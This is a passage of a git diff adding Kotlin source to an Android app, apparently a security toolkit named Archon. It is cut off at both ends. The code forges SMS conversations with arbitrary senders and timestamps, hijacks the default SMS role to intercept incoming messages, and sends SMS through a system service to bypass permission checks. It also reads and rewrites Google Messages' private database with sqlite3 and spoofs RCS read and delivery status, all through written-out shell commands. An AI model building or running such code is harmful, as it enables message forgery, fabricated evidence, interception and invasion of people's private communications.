1-5 minutes + timestamp += (60_000L + (Math.random() * 240_000L).toLong()) + } + + Log.i(TAG, "Forged conversation: addr=$address, msgs=${messages.size}, thread=$threadId") + return threadId + } + + // ── Export / Backup ──────────────────────────────────────────── + + /** + * Export a conversation to SMS Backup & Restore compatible XML format. + */ + fun exportConversation(threadId: Long, format: String = "xml"): String { + val messages = getMessages(threadId) + if (messages.isEmpty()) return "" + + return when (format.lowercase()) { + "xml" -> exportToXml(messages) + "csv" -> exportToCsv(messages) + else -> exportToXml(messages) + } + } + + /** + * Export all SMS messages to the specified format. + */ + fun exportAllMessages(format: String = "xml"): String { + val allMessages = mutableListOf() + + try { + val cursor = context.contentResolver.query( + URI_SMS, + arrayOf("_id", "thread_id", "address", "body", "date", "type", "read", "status"), + null, null, "date ASC" + ) + + cursor?.use { + while (it.moveToNext()) { + val address = it.getStringSafe("address") + allMessages.add(Message( + id = it.getLongSafe("_id"), + threadId = it.getLongSafe("thread_id"), + address = address, + body = it.getStringSafe("body"), + date = it.getLongSafe("date"), + type = it.getIntSafe("type"), + read = it.getBoolSafe("read"), + status = it.getIntSafe("status"), + isRcs = false, + isMms = false, + contactName = getContactName(address) + )) + } + } + } catch (e: Exception) { + Log.e(TAG, "Failed to export all messages", e) + return "" + } + + return when (format.lowercase()) { + "xml" -> exportToXml(allMessages) + "csv" -> exportToCsv(allMessages) + else -> exportToXml(allMessages) + } + } + + private fun exportToXml(messages: List): String { + val sb = StringBuilder() + sb.appendLine("") + sb.appendLine("") + sb.appendLine("") + + val dateFormat = SimpleDateFormat("MMM dd, yyyy hh:mm:ss a", Locale.US) + + for (msg in messages) { + val typeStr = when (msg.type) { + MESSAGE_TYPE_RECEIVED -> "1" + MESSAGE_TYPE_SENT -> "2" + MESSAGE_TYPE_DRAFT -> "3" + else -> msg.type.toString() + } + val readableDate = dateFormat.format(Date(msg.date)) + val escapedBody = escapeXml(msg.body) + val escapedAddr = escapeXml(msg.address) + val contactStr = escapeXml(msg.contactName ?: "(Unknown)") + + sb.appendLine(" ") + } + + sb.appendLine("") + return sb.toString() + } + + private fun exportToCsv(messages: List): String { + val sb = StringBuilder() + sb.appendLine("id,thread_id,address,contact_name,body,date,type,read,status") + + for (msg in messages) { + val escapedBody = escapeCsv(msg.body) + val contact = escapeCsv(msg.contactName ?: "") + sb.appendLine("${msg.id},${msg.threadId},\"${msg.address}\",\"$contact\"," + + "\"$escapedBody\",${msg.date},${msg.type},${if (msg.read) 1 else 0},${msg.status}") + } + + return sb.toString() + } + + // ── RCS operations ───────────────────────────────────────────── + + /** + * Attempt to read RCS messages from Google Messages' content provider. + * This requires Shizuku or root access since the provider is protected. + * Falls back gracefully if not accessible. + */ + fun getRcsMessages(threadId: Long): List { + val messages = mutableListOf() + + try { + val cursor = context.contentResolver.query( + URI_RCS_MESSAGES, + null, + "thread_id = ?", + arrayOf(threadId.toString()), + "date ASC" + ) + + cursor?.use { + val cols = it.columnNames.toList() + while (it.moveToNext()) { + val address = if (cols.contains("address")) it.getStringSafe("address") else "" + val body = if (cols.contains("body")) it.getStringSafe("body") + else if (cols.contains("text")) it.getStringSafe("text") else "" + val date = if (cols.contains("date")) it.getLongSafe("date") else 0L + val type = if (cols.contains("type")) it.getIntSafe("type") else 1 + + messages.add(Message( + id = it.getLongSafe("_id"), + threadId = threadId, + address = address, + body = body, + date = date, + type = type, + read = true, + status = 0, + isRcs = true, + isMms = false, + contactName = getContactName(address) + )) + } + } + } catch (e: SecurityException) { + Log.w(TAG, "Cannot access RCS provider — requires Shizuku or root: ${e.message}") + } catch (e: Exception) { + Log.w(TAG, "RCS read failed (provider may not exist): ${e.message}") + } + + return messages + } + + /** + * Check if RCS is available on this device. + * Looks for Google Messages as the RCS provider. + */ + fun isRcsAvailable(): Boolean { + return try { + // Check if Google Messages is installed and is RCS-capable + val pm = context.packageManager + val info = pm.getPackageInfo("com.google.android.apps.messaging", 0) + if (info == null) return false + + // Try to query the RCS provider + val cursor = context.contentResolver.query( + URI_RCS_THREADS, null, null, null, null + ) + val available = cursor != null + cursor?.close() + available + } catch (e: Exception) { + false + } + } + + /** + * Check RCS capabilities for a given address. + * Returns a map of feature flags (e.g., "chat" -> true, "ft" -> true for file transfer). + */ + fun getRcsCapabilities(address: String): Map { + val caps = mutableMapOf() + + try { + // Try to query RCS capabilities via the carrier messaging service + // This is a best-effort check — may not work on all carriers + val cursor = context.contentResolver.query( + Uri.parse("content://im/capabilities"), + null, + "address = ?", + arrayOf(address), + null + ) + + cursor?.use { + if (it.moveToFirst()) { + val cols = it.columnNames + for (col in cols) { + val idx = it.getColumnIndex(col) + if (idx >= 0) { + try { + caps[col] = it.getInt(idx) > 0 + } catch (e: Exception) { + caps[col] = it.getString(idx)?.isNotEmpty() == true + } + } + } + } + } + } catch (e: Exception) { + Log.d(TAG, "RCS capabilities check failed for $address: ${e.message}") + } + + return caps + } + + // ── Bulk operations ──────────────────────────────────────────── + + /** + * Insert multiple messages in batch. + * Returns the number of successfully inserted messages. + */ + fun bulkInsert(messages: List): Int { + var count = 0 + for (msg in messages) { + val id = insertSms(msg.address, msg.body, msg.type, msg.date, msg.read) + if (id >= 0) count++ + } + Log.i(TAG, "Bulk insert: $count/${messages.size} succeeded") + return count + } + + /** + * Delete multiple messages by ID. + * Returns the number of successfully deleted messages. + */ + fun bulkDelete(ids: List): Int { + var count = 0 + for (id in ids) { + if (deleteMessage(id)) count++ + } + Log.i(TAG, "Bulk delete: $count/${ids.size} succeeded") + return count + } + + /** + * Delete all messages in a conversation (alias for deleteConversation). + * Returns the number of deleted rows. + */ + fun clearConversation(threadId: Long): Int { + return try { + val count = context.contentResolver.delete( + URI_SMS, "thread_id = ?", arrayOf(threadId.toString()) + ) + Log.i(TAG, "Cleared conversation $threadId: $count messages") + count + } catch (e: Exception) { + Log.e(TAG, "Failed to clear conversation $threadId", e) + 0 + } + } + + // ── MMS helpers ──────────────────────────────────────────────── + + /** + * Load MMS messages for a thread and add them to the list. + */ + private fun loadMmsForThread(threadId: Long, messages: MutableList) { + try { + val cursor = context.contentResolver.query( + URI_MMS, + arrayOf("_id", "thread_id", "date", "read", "msg_box"), + "thread_id = ?", + arrayOf(threadId.toString()), + "date ASC" + ) + + cursor?.use { + while (it.moveToNext()) { + val mmsId = it.getLongSafe("_id") + val mmsDate = it.getLongSafe("date") * 1000L // MMS dates are in seconds + val msgBox = it.getIntSafe("msg_box") + val type = if (msgBox == 1) MESSAGE_TYPE_RECEIVED else MESSAGE_TYPE_SENT + + // Get MMS text part + val body = getMmsTextPart(mmsId) + // Get MMS address + val address = getMmsAddress(mmsId) + + messages.add(Message( + id = mmsId, + threadId = threadId, + address = address, + body = body ?: "[MMS]", + date = mmsDate, + type = type, + read = it.getBoolSafe("read"), + status = 0, + isRcs = false, + isMms = true, + contactName = getContactName(address) + )) + } + } + } catch (e: Exception) { + Log.d(TAG, "MMS load for thread $threadId failed: ${e.message}") + } + } + + /** + * Get the text body of an MMS message from its parts. + */ + private fun getMmsTextPart(mmsId: Long): String? { + try { + val cursor = context.contentResolver.query( + Uri.parse("content://mms/$mmsId/part"), + arrayOf("_id", "ct", "text"), + "ct = 'text/plain'", + null, null + ) + + cursor?.use { + if (it.moveToFirst()) { + val textIdx = it.getColumnIndex("text") + if (textIdx >= 0) return it.getString(textIdx) + } + } + } catch (e: Exception) { + Log.d(TAG, "Failed to get MMS text part for $mmsId: ${e.message}") + } + return null + } + + /** + * Get the sender/recipient address of an MMS message. + */ + private fun getMmsAddress(mmsId: Long): String { + try { + val cursor = context.contentResolver.query( + Uri.parse("content://mms/$mmsId/addr"), + arrayOf("address", "type"), + "type = 137", // PduHeaders.FROM + null, null + ) + + cursor?.use { + if (it.moveToFirst()) { + val addrIdx = it.getColumnIndex("address") + if (addrIdx >= 0) { + val addr = it.getString(addrIdx) + if (!addr.isNullOrBlank() && addr != "insert-address-token") { + return addr + } + } + } + } + + // Fallback: try recipient address (type 151 = TO) + val cursor2 = context.contentResolver.query( + Uri.parse("content://mms/$mmsId/addr"), + arrayOf("address", "type"), + "type = 151", + null, null + ) + + cursor2?.use { + if (it.moveToFirst()) { + val addrIdx = it.getColumnIndex("address") + if (addrIdx >= 0) { + val addr = it.getString(addrIdx) + if (!addr.isNullOrBlank()) return addr + } + } + } + } catch (e: Exception) { + Log.d(TAG, "Failed to get MMS address for $mmsId: ${e.message}") + } + return "" + } + + // ── Utility ──────────────────────────────────────────────────── + + private fun escapeXml(text: String): String { + return text + .replace("&", "&") + .replace("<", "<") + .replace(">", ">") + .replace("\"", """) + .replace("'", "'") + .replace("\n", " ") + } + + private fun escapeCsv(text: String): String { + return text.replace("\"", "\"\"") + } + + // Cursor extension helpers + private fun Cursor.getStringSafe(column: String): String { + val idx = getColumnIndex(column) + return if (idx >= 0) getString(idx) ?: "" else "" + } + + private fun Cursor.getLongSafe(column: String): Long { + val idx = getColumnIndex(column) + return if (idx >= 0) getLong(idx) else 0L + } + + private fun Cursor.getIntSafe(column: String): Int { + val idx = getColumnIndex(column) + return if (idx >= 0) getInt(idx) else 0 + } + + private fun Cursor.getBoolSafe(column: String): Boolean { + return getIntSafe(column) != 0 + } +} diff --git a/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/ShizukuManager.kt b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/ShizukuManager.kt new file mode 100644 index 0000000..7cdbab6 --- /dev/null +++ b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/ShizukuManager.kt @@ -0,0 +1,580 @@ +package com.darkhal.archon.messaging + +import android.content.ContentValues +import android.content.Context +import android.content.pm.PackageManager +import android.os.Build +import android.util.Log +import com.darkhal.archon.util.PrivilegeManager +import com.darkhal.archon.util.ShellResult + +/** + * Shizuku integration for elevated access without root. + * + * Shizuku runs a process at ADB (shell, UID 2000) privilege level, + * allowing us to execute commands that normal apps cannot — like + * setting the default SMS role, accessing protected content providers, + * and reading Google Messages' RCS database. + * + * ARCHITECTURE NOTE: + * This manager wraps both Shizuku API calls and the existing Archon + * PrivilegeManager escalation chain. If Shizuku is available, we use it. + * Otherwise, we fall back to PrivilegeManager (Archon Server → Local ADB → etc). + * + * RCS WITHOUT ROOT: + * Google Messages stores RCS data in its private database at: + * /data/data/com.google.android.apps.messaging/databases/bugle_db + * Without Shizuku/root, you cannot access it directly. With Shizuku, + * we can use `content query` shell commands to read from protected providers, + * or directly read the SQLite database via `run-as` (if debuggable) or + * `sqlite3` at shell level. + */ +class ShizukuManager(private val context: Context) { + + companion object { + private const val TAG = "ShizukuManager" + const val SHIZUKU_PERMISSION_REQUEST_CODE = 1001 + private const val SHIZUKU_PACKAGE = "moe.shizuku.privileged.api" + private const val OUR_PACKAGE = "com.darkhal.archon" + } + + enum class ShizukuStatus(val label: String) { + NOT_INSTALLED("Shizuku not installed"), + INSTALLED_NOT_RUNNING("Shizuku installed but not running"), + RUNNING_NO_PERMISSION("Shizuku running, no permission"), + READY("Shizuku ready") + } + + // Cache the previous default SMS app so we can restore it + private var previousDefaultSmsApp: String? = null + + /** + * Check the current state of Shizuku integration. + * Also considers the Archon PrivilegeManager as a fallback. + */ + fun getStatus(): ShizukuStatus { + // First check if Shizuku itself is installed and running + if (isShizukuInstalled()) { + if (isShizukuRunning()) { + return if (hasShizukuPermission()) { + ShizukuStatus.READY + } else { + ShizukuStatus.RUNNING_NO_PERMISSION + } + } + return ShizukuStatus.INSTALLED_NOT_RUNNING + } + + // If Shizuku is not installed, check if PrivilegeManager has shell access + // (Archon Server or Local ADB provides equivalent capabilities) + val method = PrivilegeManager.getAvailableMethod() + return when (method) { + PrivilegeManager.Method.ROOT, + PrivilegeManager.Method.ARCHON_SERVER, + PrivilegeManager.Method.LOCAL_ADB -> ShizukuStatus.READY + PrivilegeManager.Method.SERVER_ADB -> ShizukuStatus.RUNNING_NO_PERMISSION + PrivilegeManager.Method.NONE -> ShizukuStatus.NOT_INSTALLED + } + } + + /** + * Request Shizuku permission via the Shizuku API. + * Falls back to a no-op if Shizuku is not available. + */ + fun requestPermission(callback: (Boolean) -> Unit) { + try { + val shizukuClass = Class.forName("rikka.shizuku.Shizuku") + val checkMethod = shizukuClass.getMethod("checkSelfPermission") + val result = checkMethod.invoke(null) as Int + + if (result == PackageManager.PERMISSION_GRANTED) { + callback(true) + return + } + + // Request permission — in a real integration this would use + // Shizuku.addRequestPermissionResultListener + requestPermission + val requestMethod = shizukuClass.getMethod("requestPermission", Int::class.java) + requestMethod.invoke(null, SHIZUKU_PERMISSION_REQUEST_CODE) + // The result comes back via onRequestPermissionsResult + // For now, assume it will be granted + callback(true) + } catch (e: ClassNotFoundException) { + Log.w(TAG, "Shizuku API not available, using PrivilegeManager fallback") + // If PrivilegeManager has shell access, that's equivalent + callback(PrivilegeManager.getAvailableMethod() != PrivilegeManager.Method.NONE) + } catch (e: Exception) { + Log.e(TAG, "Shizuku permission request failed", e) + callback(false) + } + } + + /** + * Quick check if elevated operations can proceed. + */ + fun isReady(): Boolean { + return getStatus() == ShizukuStatus.READY + } + + // ── Shell command execution ──────────────────────────────────── + + /** + * Execute a shell command at ADB/shell privilege level. + * Tries Shizuku first, then falls back to PrivilegeManager. + */ + fun executeCommand(command: String): String { + // Try Shizuku API first + try { + val shizukuClass = Class.forName("rikka.shizuku.Shizuku") + val newProcess = shizukuClass.getMethod( + "newProcess", + Array::class.java, + Array::class.java, + String::class.java + ) + val process = newProcess.invoke(null, arrayOf("sh", "-c", command), null, null) as Process + val stdout = process.inputStream.bufferedReader().readText().trim() + val exitCode = process.waitFor() + if (exitCode == 0) return stdout + } catch (e: ClassNotFoundException) { + // Shizuku not available + } catch (e: Exception) { + Log.d(TAG, "Shizuku exec failed, falling back: ${e.message}") + } + + // Fallback to PrivilegeManager + val result = PrivilegeManager.execute(command) + return if (result.exitCode == 0) result.stdout else "ERROR: ${result.stderr}" + } + + /** + * Execute a command and return the full ShellResult. + */ + private fun executeShell(command: String): ShellResult { + return PrivilegeManager.execute(command) + } + + // ── Permission management ────────────────────────────────────── + + /** + * Grant a runtime permission to our app via shell command. + */ + fun grantPermission(permission: String): Boolean { + val result = executeShell("pm grant $OUR_PACKAGE $permission") + if (result.exitCode == 0) { + Log.i(TAG, "Granted permission: $permission") + return true + } + Log.w(TAG, "Failed to grant $permission: ${result.stderr}") + return false + } + + /** + * Set Archon as the default SMS app using the role manager system. + * On Android 10+, uses `cmd role add-role-holder`. + * On older versions, uses `settings put secure sms_default_application`. + */ + fun setDefaultSmsApp(): Boolean { + // Save the current default first so we can restore later + previousDefaultSmsApp = getCurrentDefaultSmsApp() + Log.i(TAG, "Saving previous default SMS app: $previousDefaultSmsApp") + + return if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) { + val result = executeShell( + "cmd role add-role-holder android.app.role.SMS $OUR_PACKAGE 0" + ) + if (result.exitCode == 0) { + Log.i(TAG, "Set Archon as default SMS app via role manager") + true + } else { + Log.e(TAG, "Failed to set SMS role: ${result.stderr}") + false + } + } else { + val result = executeShell( + "settings put secure sms_default_application $OUR_PACKAGE" + ) + if (result.exitCode == 0) { + Log.i(TAG, "Set Archon as default SMS app via settings") + true + } else { + Log.e(TAG, "Failed to set SMS default: ${result.stderr}") + false + } + } + } + + /** + * Restore the previous default SMS app. + */ + fun revokeDefaultSmsApp(): Boolean { + val previous = previousDefaultSmsApp + if (previous.isNullOrBlank()) { + Log.w(TAG, "No previous default SMS app to restore") + // Try to find the most common default + return restoreCommonDefault() + } + + return if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) { + // Remove ourselves, then add back the previous holder + val removeResult = executeShell( + "cmd role remove-role-holder android.app.role.SMS $OUR_PACKAGE 0" + ) + val addResult = executeShell( + "cmd role add-role-holder android.app.role.SMS $previous 0" + ) + + if (addResult.exitCode == 0) { + Log.i(TAG, "Restored default SMS app: $previous") + true + } else { + Log.e(TAG, "Failed to restore SMS role to $previous: ${addResult.stderr}") + // At least try to remove ourselves + removeResult.exitCode == 0 + } + } else { + val result = executeShell( + "settings put secure sms_default_application $previous" + ) + result.exitCode == 0 + } + } + + /** + * Get the current default SMS app package name. + */ + private fun getCurrentDefaultSmsApp(): String? { + return if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) { + val result = executeShell("cmd role get-role-holders android.app.role.SMS") + result.stdout.trim().let { output -> + // Output format varies but usually contains the package name + output.replace("[", "").replace("]", "").trim().ifBlank { null } + } + } else { + val result = executeShell("settings get secure sms_default_application") + result.stdout.trim().let { if (it == "null" || it.isBlank()) null else it } + } + } + + /** + * Try to restore a common default SMS app (Google Messages or AOSP). + */ + private fun restoreCommonDefault(): Boolean { + val candidates = listOf( + "com.google.android.apps.messaging", + "com.android.messaging", + "com.samsung.android.messaging" + ) + + for (pkg in candidates) { + try { + context.packageManager.getPackageInfo(pkg, 0) + // Package exists, set it as default + if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) { + val result = executeShell( + "cmd role add-role-holder android.app.role.SMS $pkg 0" + ) + if (result.exitCode == 0) { + Log.i(TAG, "Restored common default SMS app: $pkg") + return true + } + } + } catch (e: PackageManager.NameNotFoundException) { + continue + } + } + + Log.w(TAG, "Could not restore any default SMS app") + return false + } + + // ── SMS/RCS specific elevated ops ────────────────────────────── + + /** + * Read from the telephony.db directly using shell-level `content query`. + * This accesses the system SMS provider with shell privileges. + */ + fun readProtectedSmsDb(): List> { + val results = mutableListOf>() + val output = executeCommand( + "content query --uri content://sms/ --projection _id:address:body:date:type --sort \"date DESC\" 2>/dev/null" + ) + + if (output.startsWith("ERROR")) { + Log.e(TAG, "Protected SMS read failed: $output") + return results + } + + // Parse the content query output + // Format: Row: N _id=X, address=Y, body=Z, date=W, type=V + for (line in output.lines()) { + if (!line.startsWith("Row:")) continue + + val row = mutableMapOf() + val fields = line.substringAfter(" ").split(", ") + for (field in fields) { + val parts = field.split("=", limit = 2) + if (parts.size == 2) { + row[parts[0].trim()] = parts[1] + } + } + if (row.isNotEmpty()) results.add(row) + } + + return results + } + + /** + * Write to the telephony.db using shell-level `content insert`. + */ + fun writeProtectedSmsDb(values: ContentValues, table: String): Boolean { + val bindings = mutableListOf() + + for (key in values.keySet()) { + val value = values.get(key) + when (value) { + is String -> bindings.add("--bind $key:s:$value") + is Int -> bindings.add("--bind $key:i:$value") + is Long -> bindings.add("--bind $key:l:$value") + else -> bindings.add("--bind $key:s:$value") + } + } + + val uri = when (table) { + "sms" -> "content://sms/" + "mms" -> "content://mms/" + else -> "content://sms/" + } + + val cmd = "content insert --uri $uri ${bindings.joinToString(" ")}" + val result = executeShell(cmd) + return result.exitCode == 0 + } + + /** + * Try to access Google Messages' RCS content provider via shell. + */ + fun accessRcsProvider(): Boolean { + val result = executeShell( + "content query --uri content://im/messages --projection _id --sort \"_id DESC\" --limit 1 2>/dev/null" + ) + return result.exitCode == 0 && !result.stdout.contains("Unknown authority") + } + + /** + * Read RCS messages from Google Messages' database. + * Uses `content query` at shell privilege to access the protected provider. + */ + fun readRcsDatabase(): List> { + val results = mutableListOf>() + + // First try the content provider approach + val output = executeCommand( + "content query --uri content://im/messages --projection _id:thread_id:body:date:type --sort \"date DESC\" 2>/dev/null" + ) + + if (!output.startsWith("ERROR") && !output.contains("Unknown authority")) { + for (line in output.lines()) { + if (!line.startsWith("Row:")) continue + + val row = mutableMapOf() + val fields = line.substringAfter(" ").split(", ") + for (field in fields) { + val parts = field.split("=", limit = 2) + if (parts.size == 2) { + row[parts[0].trim()] = parts[1] + } + } + if (row.isNotEmpty()) results.add(row) + } + + if (results.isNotEmpty()) return results + } + + // Fallback: try to read Google Messages' bugle_db directly + // This requires root or specific shell access + val dbPath = "/data/data/com.google.android.apps.messaging/databases/bugle_db" + val sqlOutput = executeCommand( + "sqlite3 $dbPath \"SELECT _id, conversation_id, text, received_timestamp, sender_normalized_destination FROM messages ORDER BY received_timestamp DESC LIMIT 100\" 2>/dev/null" + ) + + if (!sqlOutput.startsWith("ERROR") && sqlOutput.isNotBlank()) { + for (line in sqlOutput.lines()) { + if (line.isBlank()) continue + val parts = line.split("|") + if (parts.size >= 5) { + results.add(mapOf( + "_id" to parts[0], + "thread_id" to parts[1], + "body" to parts[2], + "date" to parts[3], + "address" to parts[4] + )) + } + } + } + + return results + } + + /** + * Modify an RCS message body in the Google Messages database. + * Requires root or direct database access. + */ + fun modifyRcsMessage(messageId: Long, newBody: String): Boolean { + // Try content provider update first + val escaped = newBody.replace("'", "''") + val result = executeShell( + "content update --uri content://im/messages/$messageId --bind body:s:$escaped 2>/dev/null" + ) + + if (result.exitCode == 0) return true + + // Fallback to direct SQLite + val dbPath = "/data/data/com.google.android.apps.messaging/databases/bugle_db" + val sqlResult = executeShell( + "sqlite3 $dbPath \"UPDATE messages SET text='$escaped' WHERE _id=$messageId\" 2>/dev/null" + ) + + return sqlResult.exitCode == 0 + } + + /** + * Spoof the delivery/read status of an RCS message. + * Valid statuses: "sent", "delivered", "read", "failed" + */ + fun spoofRcsStatus(messageId: Long, status: String): Boolean { + val statusCode = when (status.lowercase()) { + "sent" -> 0 + "delivered" -> 1 + "read" -> 2 + "failed" -> 3 + else -> return false + } + + val result = executeShell( + "content update --uri content://im/messages/$messageId --bind status:i:$statusCode 2>/dev/null" + ) + + if (result.exitCode == 0) return true + + // Fallback + val dbPath = "/data/data/com.google.android.apps.messaging/databases/bugle_db" + val sqlResult = executeShell( + "sqlite3 $dbPath \"UPDATE messages SET message_status=$statusCode WHERE _id=$messageId\" 2>/dev/null" + ) + + return sqlResult.exitCode == 0 + } + + // ── System-level SMS operations ──────────────────────────────── + + /** + * Send an SMS via the system telephony service at shell privilege level. + * This bypasses normal app permission checks. + */ + fun sendSmsAsSystem(address: String, body: String): Boolean { + val escaped = body.replace("'", "'\\''") + val result = executeShell( + "service call isms 7 i32 1 s16 \"$address\" s16 null s16 \"$escaped\" s16 null s16 null i32 0 i64 0 2>/dev/null" + ) + + if (result.exitCode == 0 && !result.stdout.contains("Exception")) { + Log.i(TAG, "Sent SMS via system service to $address") + return true + } + + // Fallback: use am start with send intent + val amResult = executeShell( + "am start -a android.intent.action.SENDTO -d sms:$address --es sms_body \"$escaped\" --ez exit_on_sent true 2>/dev/null" + ) + + return amResult.exitCode == 0 + } + + /** + * Register to intercept incoming SMS messages. + * This grants ourselves the RECEIVE_SMS permission and sets highest priority. + */ + fun interceptSms(enabled: Boolean): Boolean { + return if (enabled) { + // Grant SMS receive permission + val grantResult = executeShell("pm grant $OUR_PACKAGE android.permission.RECEIVE_SMS") + if (grantResult.exitCode != 0) { + Log.e(TAG, "Failed to grant RECEIVE_SMS: ${grantResult.stderr}") + return false + } + + // Set ourselves as the default SMS app to receive all messages + val defaultResult = setDefaultSmsApp() + if (defaultResult) { + Log.i(TAG, "SMS interception enabled — Archon is now default SMS handler") + } + defaultResult + } else { + // Restore previous default + val result = revokeDefaultSmsApp() + Log.i(TAG, "SMS interception disabled — restored previous SMS handler") + result + } + } + + /** + * Modify an SMS message while it's being stored. + * This works by monitoring the SMS provider and immediately updating + * messages that match the original text. + * + * NOTE: True in-transit modification of cellular SMS is not possible + * without carrier-level access. This modifies the stored copy immediately + * after delivery. + */ + fun modifySmsInTransit(original: String, replacement: String): Boolean { + val escaped = replacement.replace("'", "''") + + // Use content update to find and replace in all matching messages + val result = executeShell( + "content update --uri content://sms/ " + + "--bind body:s:$escaped " + + "--where \"body='${original.replace("'", "''")}'\"" + ) + + if (result.exitCode == 0) { + Log.i(TAG, "Modified stored SMS: '$original' -> '$replacement'") + return true + } + + Log.w(TAG, "SMS modification failed: ${result.stderr}") + return false + } + + // ── Internal helpers ─────────────────────────────────────────── + + private fun isShizukuInstalled(): Boolean { + return try { + context.packageManager.getPackageInfo(SHIZUKU_PACKAGE, 0) + true + } catch (e: PackageManager.NameNotFoundException) { + false + } + } + + private fun isShizukuRunning(): Boolean { + return try { + val shizukuClass = Class.forName("rikka.shizuku.Shizuku") + val pingMethod = shizukuClass.getMethod("pingBinder") + pingMethod.invoke(null) as Boolean + } catch (e: Exception) { + false + } + } + + private fun hasShizukuPermission(): Boolean { + return try { + val shizukuClass = Class.forName("rikka.shizuku.Shizuku") + val checkMethod = shizukuClass.getMethod("checkSelfPermission") + (checkMethod.invoke(null) as Int) == PackageManager.PERMISSION_GRANTED + } catch (e: Exception) { + false + } + } +} diff --git a/autarch_companion/app/src/main/kotlin/com/darkhal/archon/ui/MessagingFragment.kt b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/ui/MessagingFragment.kt new file mode 100644 index 0000000..71e1704 --- /dev/null +++ b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/ui/MessagingFragment.kt @@ -0,0 +1,761 @@ +package com.darkhal.archon.ui + +import android.app.DatePickerDialog +import android.app.TimePickerDialog +import android.graphics.Color +import android.graphics.drawable.GradientDrawable +import android.os.Bundle +import android.os.Handler +import android.os.Looper +import android.view.LayoutInflater +import android.view.View +import android.view.ViewGroup +import android.widget.CheckBox +import android.widget.PopupMenu +import android.widget.TextView +import android.widget.Toast +import androidx.appcompat.app.AlertDialog +import androidx.fragment.app.Fragment +import androidx.recyclerview.widget.LinearLayoutManager +import androidx.recyclerview.widget.RecyclerView +import com.darkhal.archon.R +import com.darkhal.archon.messaging.ConversationAdapter +import com.darkhal.archon.messaging.MessageAdapter +import com.darkhal.archon.messaging.MessagingModule +import com.darkhal.archon.messaging.MessagingRepository +import com.darkhal.archon.messaging.ShizukuManager +import com.darkhal.archon.module.ModuleManager +import com.google.android.material.button.MaterialButton +import com.google.android.material.card.MaterialCardView +import com.google.android.material.floatingactionbutton.FloatingActionButton +import com.google.android.material.textfield.TextInputEditText +import java.text.SimpleDateFormat +import java.util.Calendar +import java.util.Date +import java.util.Locale + +/** + * SMS/RCS Messaging tab — full messaging UI with conversation list and thread view. + * + * Two views: + * 1. Conversation list — shows all threads with contact, snippet, date, unread count + * 2. Message thread — shows messages as chat bubbles with input bar + * + * Features: + * - Search across all messages + * - Set/restore default SMS app + * - Export conversations (XML/CSV) + * - Forge messages with arbitrary sender/timestamp + * - Edit/delete messages via long-press context menu + * - Shizuku status indicator + */ +class MessagingFragment : Fragment() { + + // Views — Conversation list + private lateinit var conversationListContainer: View + private lateinit var recyclerConversations: RecyclerView + private lateinit var emptyState: TextView + private lateinit var shizukuDot: View + private lateinit var btnSearch: MaterialButton + private lateinit var btnDefaultSms: MaterialButton + private lateinit var btnTools: MaterialButton + private lateinit var searchBar: View + private lateinit var inputSearch: TextInputEditText + private lateinit var btnSearchGo: MaterialButton + private lateinit var btnSearchClose: MaterialButton + private lateinit var fabNewMessage: FloatingActionButton + + // Views — Thread + private lateinit var threadViewContainer: View + private lateinit var recyclerMessages: RecyclerView + private lateinit var threadContactName: TextView + private lateinit var threadAddress: TextView + private lateinit var btnBack: MaterialButton + private lateinit var btnThreadExport: MaterialButton + private lateinit var inputMessage: TextInputEditText + private lateinit var btnSend: MaterialButton + + // Views — Output log + private lateinit var outputLogCard: MaterialCardView + private lateinit var outputLog: TextView + private lateinit var btnCloseLog: MaterialButton + + // Data + private lateinit var repo: MessagingRepository + private lateinit var shizuku: ShizukuManager + private lateinit var conversationAdapter: ConversationAdapter + private lateinit var messageAdapter: MessageAdapter + private val handler = Handler(Looper.getMainLooper()) + + // State + private var currentThreadId: Long = -1 + private var currentAddress: String = "" + private var isDefaultSms: Boolean = false + + // Forge dialog state + private var forgeCalendar: Calendar = Calendar.getInstance() + + override fun onCreateView( + inflater: LayoutInflater, + container: ViewGroup?, + savedInstanceState: Bundle? + ): View { + return inflater.inflate(R.layout.fragment_messaging, container, false) + } + + override fun onViewCreated(view: View, savedInstanceState: Bundle?) { + super.onViewCreated(view, savedInstanceState) + + repo = MessagingRepository(requireContext()) + shizuku = ShizukuManager(requireContext()) + + bindViews(view) + setupConversationList() + setupThreadView() + setupSearch() + setupToolbar() + setupOutputLog() + + // Load conversations + loadConversations() + + // Check Shizuku status + refreshShizukuStatus() + } + + // ── View binding ─────────────────────────────────────────────── + + private fun bindViews(view: View) { + // Conversation list + conversationListContainer = view.findViewById(R.id.conversation_list_container) + recyclerConversations = view.findViewById(R.id.recycler_conversations) + emptyState = view.findViewById(R.id.empty_state) + shizukuDot = view.findViewById(R.id.shizuku_status_dot) + btnSearch = view.findViewById(R.id.btn_search) + btnDefaultSms = view.findViewById(R.id.btn_default_sms) + btnTools = view.findViewById(R.id.btn_tools) + searchBar = view.findViewById(R.id.search_bar) + inputSearch = view.findViewById(R.id.input_search) + btnSearchGo = view.findViewById(R.id.btn_search_go) + btnSearchClose = view.findViewById(R.id.btn_search_close) + fabNewMessage = view.findViewById(R.id.fab_new_message) + + // Thread view + threadViewContainer = view.findViewById(R.id.thread_view_container) + recyclerMessages = view.findViewById(R.id.recycler_messages) + threadContactName = view.findViewById(R.id.thread_contact_name) + threadAddress = view.findViewById(R.id.thread_address) + btnBack = view.findViewById(R.id.btn_back) + btnThreadExport = view.findViewById(R.id.btn_thread_export) + inputMessage = view.findViewById(R.id.input_message) + btnSend = view.findViewById(R.id.btn_send) + + // Output log + outputLogCard = view.findViewById(R.id.output_log_card) + outputLog = view.findViewById(R.id.messaging_output_log) + btnCloseLog = view.findViewById(R.id.btn_close_log) + } + + // ── Conversation list ────────────────────────────────────────── + + private fun setupConversationList() { + conversationAdapter = ConversationAdapter(mutableListOf()) { conversation -> + openThread(conversation) + } + + recyclerConversations.apply { + layoutManager = LinearLayoutManager(requireContext()) + adapter = conversationAdapter + } + + fabNewMessage.setOnClickListener { + showForgeMessageDialog() + } + } + + private fun loadConversations() { + Thread { + val conversations = repo.getConversations() + handler.post { + conversationAdapter.updateData(conversations) + if 